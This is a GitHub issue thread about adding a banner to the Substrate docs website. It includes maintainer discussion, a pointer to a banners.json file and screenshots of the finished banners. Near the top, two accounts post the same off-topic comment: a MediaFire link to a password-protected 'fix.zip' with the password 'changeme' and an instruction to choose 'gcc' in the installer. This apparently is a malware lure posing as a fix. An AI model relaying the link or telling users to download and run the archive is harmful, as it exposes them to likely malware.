### ISSUE TITLE
Add a ribbon to substrate-website

### ISSUE THREAD

**Issue by mordamax** [paritytech/eng-automation#13]
https://github.com/polkadot-developers/substrate-docs/pull/2172#issuecomment-2315642856

**Comment by wahyu-n** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mordamax** [comment]
@kianenigma do you have an idea what kind of copy to put there?

**Comment by kianenigma** [comment]
Hmm not an expert 😁 but anything aligned with what current banner is okay. 

Once your PR is up I'd happily help out.

**Comment by rzadp** [comment]
I found that there exists a functionality to provide banners through [this JSON file](https://github.com/paritytech/substrate-website-banner/blob/main/banners.json), so it could be done quickly just by adding an entry.

So I proposed https://github.com/paritytech/substrate-website-banner/pull/11

However, it doesn't show on mobile, so I'll also look for a different approach to inform mobile users.

**Comment by rzadp** [comment]
Banners are up:

## Desktop

![Screenshot 2024-09-13 at 16 41 04](https://github.com/user-attachments/assets/b3f3792f-9928-4258-aa2b-f48c3375df80)

---

![Screenshot 2024-09-13 at 16 40 44](https://github.com/user-attachments/assets/624574f8-5bcc-40e4-a6b6-646985dc5aa0)

## Mobile

![2024-09-13 16 40 54](https://github.com/user-attachments/assets/795f4842-a92d-41db-b470-db967d6d374c)

---

![2024-09-13 16 40 51](https://github.com/user-attachments/assets/846911ab-2546-4c62-922c-662c7ff60072)
